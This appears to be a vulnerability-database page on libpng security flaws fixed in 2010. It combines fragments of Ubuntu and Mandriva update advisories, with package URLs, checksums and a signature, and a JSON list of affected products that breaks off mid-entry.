Size/MD5: 932 cee669d58ac9660e1fe71cf9e2eeda9d
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_amd64.udeb
Size/MD5: 73938 15bb328beed6ab3287967c54e4177018
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_amd64.deb
Size/MD5: 175088 f003cc7565826cfcc337ab409ffc6e8f
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_amd64.deb
Size/MD5: 265400 2d26dc0e9ddb6c2010776fbbcb82d791
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_i386.udeb
Size/MD5: 70444 a80af68dda6ff1aa3168040d33600e64
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_i386.deb
Size/MD5: 171594 3fca9df961cc3616b75f6518ab870a68
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_i386.deb
Size/MD5: 255474 1ab05dffaa25e1d9190d0ea872b0fbd8
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_lpia.udeb
Size/MD5: 71066 0495b247d489438259937bee1f17761f
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_lpia.deb
Size/MD5: 172296 730fd7a16f9496e37ffee99ea68d15a6
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_lpia.deb
Size/MD5: 257350 fff93fe6a558aef20e20b8b8f15227e7
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_powerpc.udeb
Size/MD5: 72524 8e92aaedc8e6fabafed81cca60a833e9
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_powerpc.deb
Size/MD5: 173720 055336debc8a5b9ff92e6cae9998ac94
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_powerpc.deb
Size/MD5: 264674 dbd6ca8bcdcf241c0629b7b27e0e1e5d
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_sparc.udeb
Size/MD5: 67348 44b9c2989661e116d78b809a8657a5c8
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_sparc.deb
Size/MD5: 168516 b98b4872db6f90caf0f43da67197dec0
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_sparc.deb
Size/MD5: 257634 eb673ad114284bbd9be37e1c322e1bfb
Updated packages for Ubuntu 10.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.debian.tar.bz2
Size/MD5: 19511 ac49d7354c1ab87a91dbad607733629f
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.dsc
Size/MD5: 1299 dae31f78418d5db8c3476d7562859658
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42.orig.tar.bz2
Size/MD5: 670811 9a5cbe9798927fdf528f3186a8840ebe
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.42-1ubuntu2.1_all.deb
Size/MD5: 926 602d7036448637b45c1eacbc31e05640
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_amd64.udeb
Size/MD5: 74124 82cc493f2b3d80b10ccf3f9fa2ec4ff6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_amd64.deb
Size/MD5: 180006 3b5339fe77bcdae97bb2a318496a192e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_amd64.deb
Size/MD5: 271858 ae0c6a1e973dad2b0a0685fd863c096d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_i386.udeb
Size/MD5: 70692 b264bdd0086f3451e42df7f840ab894a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_i386.deb
Size/MD5: 176510 03c3d70135e907f21b2342972d8a9b40
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_i386.deb
Size/MD5: 261728 955b40272944dd988ee39b62d8c6606c
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_powerpc.udeb
Size/MD5: 73380 ad2cda1c89c55c473121da33a40294f6
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_powerpc.deb
Size/MD5: 179272 b6623c3dcdc841a762308f889c8b478e
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_powerpc.deb
Size/MD5: 271898 fcccfdb0eb4bc3a3470a83888f8bae28
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_sparc.udeb
Size/MD5: 69258 ec2047ed5079933d6dbeb841a0207c59
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_sparc.deb
Size/MD5: 175214 142020dfd126d2335bc93bad6a714799
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_sparc.deb
Size/MD5: 265174 06843a4a028c5533e89d5562cbeb2047
. Latest xulrunner and mozilla-thunderbird has been patched as a precaution for 2008.0 wheres on 2009.0 and up the the system libpng library is used instead of the bundled copy. htmldoc, xulrunner and mozilla-thunderbird packages is therefore also being provided with this advisory.
Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6218 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249
Updated Packages:
Mandriva Linux 2008.0: 4e91a2a256c61f52dffd4fb625e20cf8 2008.0/i586/htmldoc-1.8.27-1.2mdv2008.0.i586.rpm 71553205b1e31d2891667d2eab7aca14 2008.0/i586/htmldoc-nogui-1.8.27-1.2mdv2008.0.i586.rpm 75b6d3f905d7e94154902f81e4728963 2008.0/i586/libpng3-1.2.22-0.5mdv2008.0.i586.rpm fa0c81f2b544f65455a0e0420d9a0e56 2008.0/i586/libpng-devel-1.2.22-0.5mdv2008.0.i586.rpm d4d06a12fd8ee88295877e127757c64b 2008.0/i586/libpng-source-1.2.22-0.5mdv2008.0.i586.rpm 6687d56f95702f0e5786c885ab79c6a9 2008.0/i586/libpng-static-devel-1.2.22-0.5mdv2008.0.i586.rpm 546c18ed8ccf044a45dff3a8cd5ac5b7 2008.0/i586/libxulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.i586.rpm b428e1202d95d588fb3248c2b2fe8b2f 2008.0/i586/libxulrunner-devel-1.9.2.6-0.2mdv2008.0.i586.rpm b9541da4417ea1150c493aea591509bb 2008.0/i586/mozilla-thunderbird-3.0.5-0.2mdv2008.0.i586.rpm 3389caeeda8b8f272d0e5ed070f075b8 2008.0/i586/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.i586.rpm 901abb46652fbc19c8e655895181a949 2008.0/i586/nsinstall-3.0.5-0.2mdv2008.0.i586.rpm ad221cd523bff8f4a59037aa05e1442b 2008.0/i586/xulrunner-1.9.2.6-0.2mdv2008.0.i586.rpm d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64: 8b2eff5dd89f4ed7e3f120bbc31afa34 2008.0/x86_64/htmldoc-1.8.27-1.2mdv2008.0.x86_64.rpm 15460a7bce68e95d03a87eb14066728b 2008.0/x86_64/htmldoc-nogui-1.8.27-1.2mdv2008.0.x86_64.rpm c7577072f7ab2786a97d7df732b4299a 2008.0/x86_64/lib64png3-1.2.22-0.5mdv2008.0.x86_64.rpm fae36a86aa019cf0fcbcf0d15c508208 2008.0/x86_64/lib64png-devel-1.2.22-0.5mdv2008.0.x86_64.rpm 141ec56a2395ed150acc997eac851429 2008.0/x86_64/lib64png-static-devel-1.2.22-0.5mdv2008.0.x86_64.rpm a29c11e39685931084a085f5716afd5c 2008.0/x86_64/lib64xulrunner1.9.2.6-1.9.2.6-0.2mdv2008.0.x86_64.rpm 3a846b86c758be68420ef05e44cfe717 2008.0/x86_64/lib64xulrunner-devel-1.9.2.6-0.2mdv2008.0.x86_64.rpm 084f3b3d7c68806c7acfc7f3be701f0b 2008.0/x86_64/libpng-source-1.2.22-0.5mdv2008.0.x86_64.rpm c45f7479d93714c46d14f4ae2a5b76bd 2008.0/x86_64/mozilla-thunderbird-3.0.5-0.2mdv2008.0.x86_64.rpm 996e7a6a98997883236b08f6ec5816fa 2008.0/x86_64/mozilla-thunderbird-enigmail-3.0.5-0.2mdv2008.0.x86_64.rpm ecfdba6225b837a7a03c2ddf0d77d07f 2008.0/x86_64/nsinstall-3.0.5-0.2mdv2008.0.x86_64.rpm 394d8e8458e503ed10db7c7b7f742c2b 2008.0/x86_64/xulrunner-1.9.2.6-0.2mdv2008.0.x86_64.rpm d3dbbb58c9832db4edbc45a4023b4477 2008.0/SRPMS/htmldoc-1.8.27-1.2mdv2008.0.src.rpm 885dba7fe0581b37de05d20b838f279a 2008.0/SRPMS/libpng-1.2.22-0.5mdv2008.0.src.rpm 358c49e17d4db735f6862fdbee95a1c9 2008.0/SRPMS/mozilla-thunderbird-3.0.5-0.2mdv2008.0.src.rpm 748ab46a19f1c32808bf3e79429f2211 2008.0/SRPMS/xulrunner-1.9.2.6-0.2mdv2008.0.src.rpm
Mandriva Linux 2009.0: 28b355727c0ef89be1955a18a8c4a1cf 2009.0/i586/libpng3-1.2.31-2.3mdv2009.0.i586.rpm bf33a24dc5144d0c2362e5c7432f9434 2009.0/i586/libpng-devel-1.2.31-2.3mdv2009.0.i586.rpm e331263b8ac75ddad94f6d9d06d9c802 2009.0/i586/libpng-source-1.2.31-2.3mdv2009.0.i586.rpm 921c4ed0268fcb932f52d299ea74a28c 2009.0/i586/libpng-static-devel-1.2.31-2.3mdv2009.0.i586.rpm c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64: a20b2965684ddb18b2818d618927bb9a 2009.0/x86_64/lib64png3-1.2.31-2.3mdv2009.0.x86_64.rpm df3bbf6f7e959aea3f6065c83ece5321 2009.0/x86_64/lib64png-devel-1.2.31-2.3mdv2009.0.x86_64.rpm 3c8e3469239f93a70ccbcf56ba55cfb6 2009.0/x86_64/lib64png-static-devel-1.2.31-2.3mdv2009.0.x86_64.rpm 740cd4b4cf0d39dd03a26f0b821cfee4 2009.0/x86_64/libpng-source-1.2.31-2.3mdv2009.0.x86_64.rpm c43df36b143f834aa7351eb6a9952897 2009.0/SRPMS/libpng-1.2.31-2.3mdv2009.0.src.rpm
Mandriva Linux 2009.1: 127a1c180703d9c89f5f968d7262c469 2009.1/i586/libpng3-1.2.35-1.2mdv2009.1.i586.rpm 3bbf13f800dcbb5f4ab45ffe898f96ce 2009.1/i586/libpng-devel-1.2.35-1.2mdv2009.1.i586.rpm 2e369ee2602705f601d23a977c82ae8a 2009.1/i586/libpng-source-1.2.35-1.2mdv2009.1.i586.rpm 5784917823e881a4aa997276528bfabe 2009.1/i586/libpng-static-devel-1.2.35-1.2mdv2009.1.i586.rpm 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64: d6032db330f8b8b40af48b29fc6d3730 2009.1/x86_64/lib64png3-1.2.35-1.2mdv2009.1.x86_64.rpm 4aac775bc389d382f184d912ef50b0be 2009.1/x86_64/lib64png-devel-1.2.35-1.2mdv2009.1.x86_64.rpm fb792b3d38cf769590a2dde6ee74c755 2009.1/x86_64/lib64png-static-devel-1.2.35-1.2mdv2009.1.x86_64.rpm 0dfcb358ed06fe83e9621e06189aa8f9 2009.1/x86_64/libpng-source-1.2.35-1.2mdv2009.1.x86_64.rpm 6267ae8a72870fdd2a44962d987a6216 2009.1/SRPMS/libpng-1.2.35-1.2mdv2009.1.src.rpm
Mandriva Linux 2010.0: 76ba7b51c3eda624850a8288bd182afa 2010.0/i586/libpng3-1.2.40-1.2mdv2010.0.i586.rpm 7a936f6a94f33f0e7ffc991ff7b4ed7f 2010.0/i586/libpng-devel-1.2.40-1.2mdv2010.0.i586.rpm abd9ee162933e3208918d3190c76c0af 2010.0/i586/libpng-source-1.2.40-1.2mdv2010.0.i586.rpm bae7010f8e07568c1a9b42e20e7ddebf 2010.0/i586/libpng-static-devel-1.2.40-1.2mdv2010.0.i586.rpm cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64: 499b5e2707d19becfdab415a8008b122 2010.0/x86_64/lib64png3-1.2.40-1.2mdv2010.0.x86_64.rpm 166ca4d21e39bbb3f250806626c59154 2010.0/x86_64/lib64png-devel-1.2.40-1.2mdv2010.0.x86_64.rpm 1c4b4f2e79cf01a4388a2e395dd64cfa 2010.0/x86_64/lib64png-static-devel-1.2.40-1.2mdv2010.0.x86_64.rpm 88b678c1352aa3ed0fffb04241254128 2010.0/x86_64/libpng-source-1.2.40-1.2mdv2010.0.x86_64.rpm cc04ec15436b892a4e75f1ad18675fb6 2010.0/SRPMS/libpng-1.2.40-1.2mdv2010.0.src.rpm
Mandriva Linux 2010.1: 349ec004acb579d4466b530bfd5fbf3d 2010.1/i586/libpng3-1.2.43-1.1mdv2010.1.i586.rpm d9e323791b16319728fe1486f819e59b 2010.1/i586/libpng-devel-1.2.43-1.1mdv2010.1.i586.rpm 3101d70a79c416392fe228d34b9ba6ff 2010.1/i586/libpng-source-1.2.43-1.1mdv2010.1.i586.rpm 2ff75d1339d52d859939d81994eae477 2010.1/i586/libpng-static-devel-1.2.43-1.1mdv2010.1.i586.rpm 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm
Mandriva Linux 2010.1/X86_64: 80e4392bbe0bd06b392216a6737cd37a 2010.1/x86_64/lib64png3-1.2.43-1.1mdv2010.1.x86_64.rpm 2d7d50b539c63cd1874ed8150d7fb84a 2010.1/x86_64/lib64png-devel-1.2.43-1.1mdv2010.1.x86_64.rpm 5c3793d0bc69db028ec214a6c9f67c1e 2010.1/x86_64/lib64png-static-devel-1.2.43-1.1mdv2010.1.x86_64.rpm 06b83b6f5050410eff5fe8a590972c18 2010.1/x86_64/libpng-source-1.2.43-1.1mdv2010.1.x86_64.rpm 0638fc23b9c5f1f7b3bcd0fdaf71bea8 2010.1/SRPMS/libpng-1.2.43-1.1mdv2010.1.src.rpm
Corporate 4.0: be322ac5f446c26c2d0983a2d37e0c6c corporate/4.0/i586/htmldoc-1.8.23-8.2.20060mlcs4.i586.rpm 71329303eddfd4af0994a708bbe4a119 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.2.20060mlcs4.i586.rpm 1c1036be9452042cd356349d6251b697 corporate/4.0/i586/libpng3-1.2.8-1.8.20060mlcs4.i586.rpm e9ba6c0c604a08f555d99503ba7adb68 corporate/4.0/i586/libpng3-devel-1.2.8-1.8.20060mlcs4.i586.rpm 288d9ca48ea58918bdff316891f3c474 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.8.20060mlcs4.i586.rpm 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm
Corporate 4.0/X86_64: f761706265fcbebd220b16542a742cc9 corporate/4.0/x86_64/htmldoc-1.8.23-8.2.20060mlcs4.x86_64.rpm 79b3189809ad9176401620a41aaa1fcd corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.2.20060mlcs4.x86_64.rpm e4f9ac99ff42fbc27aae3d8942903043 corporate/4.0/x86_64/lib64png3-1.2.8-1.8.20060mlcs4.x86_64.rpm e26042ead39ce63ed5f4700d2e61e260 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm 609d6dc1b8a2b5afb029505469844c4f corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.8.20060mlcs4.x86_64.rpm 3aa4084dfc51cf4e8ba252f89d53b220 corporate/4.0/SRPMS/htmldoc-1.8.23-8.2.20060mlcs4.src.rpm b2449f493949c397ac345027783c1216 corporate/4.0/SRPMS/libpng-1.2.8-1.8.20060mlcs4.src.rpm
Mandriva Enterprise Server 5: 282337fa9e11a04ef82464c7574591f4 mes5/i586/libpng3-1.2.31-2.3mdvmes5.1.i586.rpm 92c6ec861cf7da08a498576ba412e633 mes5/i586/libpng-devel-1.2.31-2.3mdvmes5.1.i586.rpm c9efa6abde763edff47bf0c1071c9f1a mes5/i586/libpng-source-1.2.31-2.3mdvmes5.1.i586.rpm 2f5340946610590a6baec42354868888 mes5/i586/libpng-static-devel-1.2.31-2.3mdvmes5.1.i586.rpm 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64: e5f88951d2135de8587d4be94b405ce9 mes5/x86_64/lib64png3-1.2.31-2.3mdvmes5.1.x86_64.rpm 6b89da9eea105e65d7ae3c875c148473 mes5/x86_64/lib64png-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm c1e6715410bbf2081187aef6749b0e3d mes5/x86_64/lib64png-static-devel-1.2.31-2.3mdvmes5.1.x86_64.rpm cb7ef533d9966c8b531cde8a661fc0af mes5/x86_64/libpng-source-1.2.31-2.3mdvmes5.1.x86_64.rpm 488ece2aa6a2c4dc62d4c274d64c2926 mes5/SRPMS/libpng-1.2.31-2.3mdvmes5.1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFMP2A1mqjQ0CJFipgRAjw5AKDRGlB7JGhhCobOgDXKWuKOu8Q43gCeOclX KlOM1C8b0XVNVFF83vXPz9A= =E10C -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "9"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "itunes",
"scope": "eq",
"trust": 1.1,
"vendor": "apple",
"version": "10"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.04"
},
{
"_id": null,
"model": "itunes",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "12"
},
{
"_id": null,
"model": "player",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "3.1.2"
},
{
"_id": null,
"model": "workstation",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "7.1.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "6.06"
},
{
"_id": null,
"model": "iphone os",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "4.1"
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "4.1.0"
},
{
"_id": null,
"model": "player",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "2.5"
},
{
"_id": null,
"model": "safari",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "5.0.4"
},
{
"_id": null,
"model": "workstation",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "6.5.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.10"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.2"
},
{
"_id": null,
"model": "player",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "2.5.5"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.44"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.3"
},
{
"_id": null,
"model": "workstation",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "6.5.5"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.04"
},
{
"_id": null,
"model": "iphone os",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "2.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "13"
},
{
"_id": null,
"model": "workstation",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "7.1"
},
{
"_id": null,
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.0"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "player",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "3.1"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.9,
"vendor": "libpng",
"version": "1.0.42"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.9,
"vendor": "libpng",
"version": "1.0.33"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.9,
"vendor": "libpng",
"version": "1.0.32"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 0.8,
"vendor": "png group",
"version": "1.2.44"
},
{
"_id": null,
"model": "libpng",
"scope": "lt",
"trust": 0.8,
"vendor": "png group",
"version": "1.4.3"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "2.5.x"
},
{
"_id": null,
"model": "player",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "3.1.x"
},
{
"_id": null,
"model": "server",
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "6.5.x"
},
{
"_id": null,
"model": "workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "7.1.x"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"_id": null,
"model": "tv",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "(2nd generation) 4.0 software"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "2.0 to 4.1 (iphone 3g after )"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "2.1 to 4.1 (ipod touch (2nd generation) after )"
},
{
"_id": null,
"model": "ios",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "3.2 to 3.2.2 (ipad for )"
},
{
"_id": null,
"model": "ipad",
"scope": null,
"trust": 0.8,
"vendor": "apple",
"version": null
},
{
"_id": null,
"model": "iphone",
"scope": null,
"trust": 0.8,
"vendor": "apple",
"version": null
},
{
"_id": null,
"model": "ipod touch",
"scope": null,
"trust": 0.8,
"vendor": "apple",
"version": null
},
{
"_id": null,
"model": "safari",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "5"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "10"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "11 express"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "8"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "9"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3 (x86)"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3 (x86-64)"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0 (x86-64)"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0 (x86-64)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.8 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.8 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (server)"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5.0 (client)"
},
{
"_id": null,
"model": "rhel desktop workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (client)"
},
{
"_id": null,
"model": "tv",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.6,
